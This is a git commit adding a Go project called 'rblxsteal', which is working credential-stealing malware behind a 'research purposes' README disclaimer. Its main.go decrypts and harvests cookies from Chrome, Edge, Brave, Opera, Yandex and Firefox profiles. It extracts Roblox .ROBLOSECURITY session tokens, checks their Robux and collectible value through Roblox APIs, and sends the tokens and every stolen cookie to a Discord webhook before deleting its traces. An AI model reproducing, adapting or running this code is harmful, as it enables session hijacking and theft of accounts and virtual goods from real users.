add files

This commit is contained in:
scxr 2023-02-23 21:11:57 +00:00
commit 23f75ef2da
5 changed files with 449 additions and 0 deletions

3
README.md Normal file
View File

@ -0,0 +1,3 @@
I am not responsible for anything malicious done
I do not condone malicious activities
I wrote this for research purposes.

10
go.mod Normal file
View File

@ -0,0 +1,10 @@
module rblxsteal
go 1.20
require (
github.com/DisgoOrg/disgohook v1.4.4 // indirect
github.com/DisgoOrg/log v1.1.0 // indirect
github.com/DisgoOrg/restclient v1.2.8 // indirect
github.com/mattn/go-sqlite3 v1.14.16 // indirect
)

14
go.sum Normal file
View File

@ -0,0 +1,14 @@
github.com/DisgoOrg/disgohook v1.4.4 h1:6xU+nRtyCYX7RyKvRnroJE8JMv+YIrQEMBDGUjBGDlQ=
github.com/DisgoOrg/disgohook v1.4.4/go.mod h1:l7r9dZgfkA3KiV+ErxqweKaknnskmzZO+SRTNHvJTUU=
github.com/DisgoOrg/log v1.1.0 h1:a6hLfVSDuTFJc5AKQ8FDYQ5TASnwk3tciUyXThm1CR4=
github.com/DisgoOrg/log v1.1.0/go.mod h1:Qihgz6fax3JCfuO7vxVavL0LyHS0sUdQ9OmykQ2fiQs=
github.com/DisgoOrg/restclient v1.2.8 h1:0Kv2g2bNYUvAAeIpJ1oNHorRcj5z6qkO2kOlm4R7cAs=
github.com/DisgoOrg/restclient v1.2.8/go.mod h1:2pc/htya/5kjxvWNYya98sb8B4mexobxmWvhTiWPt94=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/mattn/go-sqlite3 v1.14.16 h1:yOQRA0RpS5PFz/oikGwBEqvAWhWg5ufRz4ETLjwpU1Y=
github.com/mattn/go-sqlite3 v1.14.16/go.mod h1:2eHXhiwb8IkHr+BDWZGa96P6+rkvnG63S2DGjv9HUNg=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=

329
main.go Normal file
View File

@ -0,0 +1,329 @@
package main
import (
"crypto/aes"
"crypto/cipher"
"database/sql"
b64 "encoding/base64"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"math/rand"
"os"
"path/filepath"
R "rblxsteal/roblox"
"strings"
"syscall"
"unsafe"
"github.com/DisgoOrg/disgohook"
"github.com/DisgoOrg/disgohook/api"
_ "github.com/mattn/go-sqlite3"
)
var webhook string = "webhook here"
var webhook_id string = strings.Split(webhook, "/")[5] + "/" + strings.Split(webhook, "/")[6]
type BrowserPath struct {
name string
processname string
token string
password string
cookies string
extensions string
}
type Output struct {
host_key interface{}
name interface{}
enc interface{}
}
type PasswordOutput struct {
url string
username string
password []byte
}
type MozCookies struct {
host string
name string
value []byte
}
type Cookies struct {
url string
name string
value string
}
type mystruct struct {
Hello string `json:"hello,omitempty"`
}
type DATA_BLOB struct {
cbData uint32
pbData *byte
}
func NewBlob(d []byte) *DATA_BLOB {
if len(d) == 0 {
return &DATA_BLOB{}
}
return &DATA_BLOB{
pbData: &d[0],
cbData: uint32(len(d)),
}
}
func unencrypt(buff []byte, master_key []byte) string {
starts := string(buff[:3])
if starts == "v10" || starts == "v11" {
iv := buff[3:15]
payload := buff[15:]
block, err := aes.NewCipher(master_key)
if err != nil {
panic(err.Error())
}
aead, err := cipher.NewGCM(block)
if err != nil {
panic(err.Error())
}
decrypted_pass, err := aead.Open(nil, iv, payload, nil)
if err != nil {
panic(err.Error())
}
return string(decrypted_pass)
}
return ""
}
func (b *DATA_BLOB) ToByteArray() []byte {
d := make([]byte, b.cbData)
copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:])
return d
}
func GetEncryptionKey() []byte {
local_path := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Local", "Google", "Chrome", "User Data", "Local State")
local_state_data, err := ioutil.ReadFile(local_path)
if err != nil {
}
data := make(map[string]interface{})
err = json.Unmarshal([]byte(local_state_data), &data)
if err != nil {
}
os_crypt := data["os_crypt"].(map[string]interface{})
key := os_crypt["encrypted_key"]
decoded_key, _ := b64.StdEncoding.DecodeString(key.(string))
unprotected_key := decoded_key[5:]
decreyptedkey, e := Decrypt(unprotected_key)
if e != nil {
}
return decreyptedkey
}
func Decrypt(data []byte) ([]byte, error) {
dllcrypt32 := syscall.NewLazyDLL("Crypt32.dll")
procDecryptData := dllcrypt32.NewProc("CryptUnprotectData")
dllkernel32 := syscall.NewLazyDLL("Kernel32.dll")
procLocalFree := dllkernel32.NewProc("LocalFree")
var outblob DATA_BLOB
r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob)))
if r == 0 {
return nil, err
}
defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData)))
return outblob.ToByteArray(), nil
}
const letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
func checkPathExists(p string) bool {
_, err := os.Stat(p)
if err == nil {
return true
}
if os.IsNotExist(err) {
return false
}
return false
}
func RandStringBytes(n int) string {
b := make([]byte, n)
for i := range b {
b[i] = letterBytes[rand.Intn(len(letterBytes))]
}
return string(b)
}
func getCookies(path string, cookiePath string, cookies []Cookies) []Cookies {
if !checkPathExists(path) {
return cookies
}
pathC := path + cookiePath + "/Cookies"
if !checkPathExists(pathC) {
return cookies
}
random_path := "kur" + RandStringBytes(8) + ".db"
f, _ := ioutil.ReadFile(pathC)
os.Create(random_path)
os.WriteFile(random_path, f, 0644)
db, err := sql.Open("sqlite3", random_path)
if err != nil {
log.Fatal(err)
}
defer db.Close()
row, err := db.Query("SELECT host_key, name, encrypted_value FROM cookies")
os.Remove(random_path)
if err != nil {
log.Fatal(err)
}
pathKey := path + "/Local State"
local_state_data, err := ioutil.ReadFile(pathKey)
if err != nil {
log.Fatal(err)
}
data := make(map[string]interface{})
err = json.Unmarshal([]byte(local_state_data), &data)
if err != nil {
log.Fatal(err)
}
os_crypt := data["os_crypt"].(map[string]interface{})
key := os_crypt["encrypted_key"]
decoded_key, _ := b64.StdEncoding.DecodeString(key.(string))
unprotected_key := decoded_key[5:]
decreyptedkey, e := Decrypt(unprotected_key)
if e != nil {
os.Exit(0)
}
defer row.Close()
for row.Next() {
var rowout Output
row.Scan(&rowout.host_key, &rowout.name, &rowout.enc)
cookie := unencrypt(rowout.enc.([]byte), decreyptedkey)
tmpCookie := Cookies{rowout.host_key.(string), rowout.name.(string), cookie}
cookies = append(cookies, tmpCookie)
}
return cookies
}
func firefox(cookies []Cookies) []Cookies {
path := os.Getenv("APPDATA") + `\Mozilla\Firefox\Profiles`
if !checkPathExists(path) {
return cookies
}
folders, err := os.ReadDir(path)
firefox_cookies := []string{}
if err != nil {
log.Fatal(err)
}
for _, dir := range folders {
subdir_content, err := os.ReadDir(path + "\\" + dir.Name())
if err != nil {
log.Fatal(err)
}
for _, file := range subdir_content {
if file.Name() == "cookies.sqlite" {
firefox_cookies = append(firefox_cookies, path+"\\"+dir.Name()+"\\cookies.sqlite")
}
}
}
for _, i := range firefox_cookies {
tmpfp := "kur" + RandStringBytes(8) + ".db"
f, _ := ioutil.ReadFile(i)
os.Create(tmpfp)
os.WriteFile(tmpfp, f, 0644)
db, err := sql.Open("sqlite3", tmpfp)
defer db.Close()
defer os.Remove(tmpfp)
if err != nil {
os.Remove(tmpfp)
log.Fatal(err)
}
row, err := db.Query("SELECT host, name, value FROM moz_cookies")
for row.Next() {
var rowout MozCookies
row.Scan(&rowout.host, &rowout.name, &rowout.value)
tmpCookie := Cookies{rowout.host, rowout.name, string(rowout.value)}
cookies = append(cookies, tmpCookie)
}
}
return cookies
}
func createCookiesFile(cookies []Cookies) string {
outStr := ""
for _, i := range cookies {
outStr += fmt.Sprintf("URL: %s | NAME: %s | VALUE: %s\n", i.url, i.name, i.value)
}
return outStr
}
func createRobloxDiscordWh(data R.UserInfo) {
webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id)
tosend := fmt.Sprintf("`User ID: `: `%d`\n`User Name`: `%s`\n`Robux`:`%d`\n`BuildersClub`:`%t`\n`Premium`:`%t`\n__Limiteds__ \n```", data.UserID, data.UserName, data.Robux, data.BuildersClub, data.IsPremium)
for _, asset := range data.Limiteds {
tosend += fmt.Sprintf("Name: %s | RAP: %g\n", asset.Name, asset.RecentAveragePrice)
}
tosend += "```"
tosend += fmt.Sprintf("\n`Token`: `%s`", data.Token)
webhook.SendContent(tosend)
}
func main() {
fmt.Println(webhook_id)
allCookies := []Cookies{}
roaming := os.Getenv("APPDATA")
local := os.Getenv("LOCALAPPDATA")
operaGx := BrowserPath{roaming + "/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
opera := BrowserPath{roaming + "Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
operaNeon := BrowserPath{roaming + "/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
chrome := BrowserPath{local + "/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
chromeSxs := BrowserPath{local + "/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
brave := BrowserPath{local + "/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
yandex := BrowserPath{local + "/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn"}
edge := BrowserPath{local + "/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"}
browserPaths := []BrowserPath{operaGx, opera, operaNeon, chrome, chromeSxs, brave, yandex, edge}
for _, i := range browserPaths {
allCookies = getCookies(i.name, i.cookies, allCookies)
}
allCookies = firefox(allCookies)
rblxCookies := []string{}
for _, i := range allCookies {
if i.name == ".ROBLOSECURITY" {
rblxCookies = append(rblxCookies, i.value)
}
}
if len(rblxCookies) != 0 {
rblxstuff := R.GetRobloxStuff(rblxCookies)
for _, i := range rblxstuff {
createRobloxDiscordWh(i)
}
}
towrite := createCookiesFile(allCookies)
os.Create("COOKIES.txt")
os.WriteFile("COOKIES.txt", []byte(towrite), 0644)
webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id)
reader, _ := os.Open("COOKIES.txt")
webhook.SendMessage(api.NewWebhookMessageCreateBuilder().SetContent("All Cookies logged").AddFile("COOKIES.txt", reader).Build())
os.Remove("COOKIES.txt")
here, _ := os.ReadDir("./")
for _, i := range here {
if strings.HasSuffix(i.Name(), ".db") {
os.Remove(i.Name())
}
}
}

93
roblox/robloxFunctions.go Normal file
View File

@ -0,0 +1,93 @@
package rblxsteal
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
)
type UserInfo struct {
UserID int `json:"UserID"`
UserName string `json:"UserName"`
Robux int `json:"RobuxBalance"`
Thumbnail string `json:"ThumbnailUrl"`
BuildersClub bool `json:"IsAnyBuildersClubMember"`
IsPremium bool `json:"IsPremium"`
Limiteds []Asset
Token string
}
type Asset struct {
Name string `json:"name"`
RecentAveragePrice float64 `json:"recentAveragePrice"`
}
type Response struct {
Data []Asset `json:"data"`
}
func CheckToken(token string) (UserInfo, bool) {
client := http.Client{}
userinfo := UserInfo{}
req, err := http.NewRequest("GET", "https://www.roblox.com/mobileapi/userinfo", nil)
if err != nil {
log.Fatal(err)
}
cookie := http.Cookie{Name: ".ROBLOSECURITY", Value: token}
req.AddCookie(&cookie)
res, err := client.Do(req)
body, err := ioutil.ReadAll(res.Body)
sb := string(body)
if len(sb) > 500 {
return UserInfo{}, false
} else {
err := json.Unmarshal([]byte(sb), &userinfo)
if err != nil {
log.Fatal(err)
}
return userinfo, true
}
}
func GetLimiteds(id int) []Asset {
client := http.Client{}
req, err := http.NewRequest("GET", "https://inventory.roblox.com/v1/users/"+fmt.Sprint(id)+"/assets/collectibles", nil)
if err != nil {
log.Fatal(err)
}
res, err := client.Do(req)
body, err := ioutil.ReadAll(res.Body)
sb := string(body)
var response Response
assets := []Asset{}
err = json.Unmarshal([]byte(sb), &response)
if err != nil {
log.Fatal(err)
}
for _, asset := range response.Data {
tmpAsset := Asset{asset.Name, asset.RecentAveragePrice}
assets = append(assets, tmpAsset)
}
return assets
}
func GetRobloxStuff(cookies []string) []UserInfo {
users := []UserInfo{}
for _, i := range cookies {
userInfo, valid := CheckToken(i)
userInfo.Token = i
if valid != false {
userInfo.Limiteds = GetLimiteds(userInfo.UserID)
users = append(users, userInfo)
} else {
}
}
return users
}